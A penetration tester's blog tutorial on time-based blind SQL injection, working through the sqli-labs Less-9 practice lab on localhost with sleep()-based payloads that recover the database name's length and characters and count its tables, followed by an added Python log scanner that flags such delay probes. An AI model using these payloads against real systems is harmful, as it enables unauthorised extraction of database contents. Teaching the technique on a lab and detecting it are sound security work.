congdong007

Penetration Tester, Software Developer


Time-Based Blind SQL Injection

Time-Based Blind SQL Injection Steps:

  1. First, check whether an injection vulnerability exists.
  2. Next, determine the injection type: character-based, numeric-based, or search-based.
  3. Determine which injection method is usable; in this case, union injection and Boolean-based blind injection are not available:
     ?id=1' and 1=1 %23 (page response is normal)
     ?id=1' and 1=2 %23 (page response is normal)
     ?id=1' and sleep(5) %23
     The page takes about 5 seconds longer to respond, which shows that the sleep() call reached the database and was executed, confirming time-based blind injection. Because 1=1 and 1=2 return the same page, there is no visible true/false difference for Boolean-based blind injection to rely on.
  4. Start by obtaining the length of the database name:
     ?id=1' and if((length(database())>7),sleep(5),1) %23 (5-second delay)
     ?id=1' and if((length(database())>8),sleep(5),1) %23 (no 5-second delay)
     The length is therefore greater than 7 but not greater than 8: the database name is 8 characters long.
  5. Proceed to retrieve the database name character by character:
     ?id=1' and if((ascii(substr(database(),1,1))>n),sleep(5),1) %23
     Vary n until the delay disappears; the boundary gives the ASCII code of the first character. Repeat for the second, third, ... position up to the length found in step 4.

These steps describe a method for performing time-based blind SQL injection to extract information about the database, such as the length of the database name and the characters that make up the name, one yes/no answer at a time.

Example of Time-Based Blind SQL Injection Operation:

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' no visible change
http://127.0.0.1/sqli-labs-master/Less-9/?id=1" no visible change
http://127.0.0.1/sqli-labs-master/Less-9/?id=1\ no visible change
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 1=1 --+ no visible change
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5) %23 responds after 5 seconds, so this is character-type blind injection
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 and sleep(5) %23 responds quickly, so this is not numeric-type blind injection
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((length(database())>7),sleep(5),1) %23 5-second delay
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((length(database())>8),sleep(5),1) %23 no 5-second delay
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((ascii(substr(database(),1,1))>114),sleep(5),1) %23 5-second delay
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((ascii(substr(database(),1,1))>115),sleep(5),1) %23 no 5-second delay; conclusion: the first character is s, and so on for the remaining characters
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(*) from information_schema.tables where table_schema=database())>3,sleep(5),1) --+ 5-second delay
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(*) from information_schema.tables where table_schema=database())>4,sleep(5),1) --+ no 5-second delay
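A defender-side counterpart to the probes in the steps and the example above, added here as an example that is not part of the original post: it parses constructed Apache-style access-log lines (with the response time in microseconds appended), URL-decodes the query string, and flags requests carrying MySQL delay primitives, separating probes whose delay actually fired from those answered quickly, which still leak one bit each. The log format, the 3-second threshold and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post): Apache-style
# fields with the response time in microseconds (%D) appended as the last field.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2023:13:55:36 +0000] "GET /sqli-labs-master/Less-9/?id=1 HTTP/1.1" 200 512 4210
127.0.0.1 - - [10/Oct/2023:13:55:40 +0000] "GET /sqli-labs-master/Less-9/?id=1'%20and%20sleep(5)%20%23 HTTP/1.1" 200 512 5004311
127.0.0.1 - - [10/Oct/2023:13:55:47 +0000] "GET /sqli-labs-master/Less-9/?id=1'%20and%20if((length(database())>7),sleep(5),1)%20%23 HTTP/1.1" 200 512 5003870
127.0.0.1 - - [10/Oct/2023:13:55:53 +0000] "GET /sqli-labs-master/Less-9/?id=1'%20and%20if((length(database())>8),sleep(5),1)%20%23 HTTP/1.1" 200 512 3902
10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=sleeping%20bag HTTP/1.1" 200 2048 3100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<bytes>\d+) (?P<us>\d+)$')
# MySQL delay primitives must be followed by "(" so "sleeping bag" is not flagged.
DELAY_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.IGNORECASE)

def classify(line, slow_ms=3000):
    """Return (ip, verdict, decoded_query), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode %20/%23/+ so the payload reads the way the database saw it.
    query = unquote_plus(m['path'].partition('?')[2])
    elapsed_ms = int(m['us']) / 1000
    if not DELAY_RE.search(query):
        verdict = 'clean'
    elif elapsed_ms >= slow_ms:
        verdict = 'delay_executed'   # sleep() ran: the injected condition was true
    else:
        verdict = 'delay_attempted'  # a fast answer is still an oracle bit (condition false)
    return m['ip'], verdict, query

def scan(log_text, slow_ms=3000):
    """Classify every line and count delay probes per client address."""
    findings = [c for c in (classify(l, slow_ms) for l in log_text.splitlines()) if c]
    per_ip = {}
    for ip, verdict, _ in findings:
        if verdict != 'clean':
            per_ip[ip] = per_ip.get(ip, 0) + 1
    return findings, per_ip

if __name__ == '__main__':
    findings, per_ip = scan(SAMPLE_LOG)
    for ip, verdict, query in findings:
        print(f'{ip:12} {verdict:16} {query}')
    print('probes per client:', per_ip)
```

A run of several delay probes from one client within seconds, alternating slow and fast, is the signature to alert on; a single slow request alone is weak evidence.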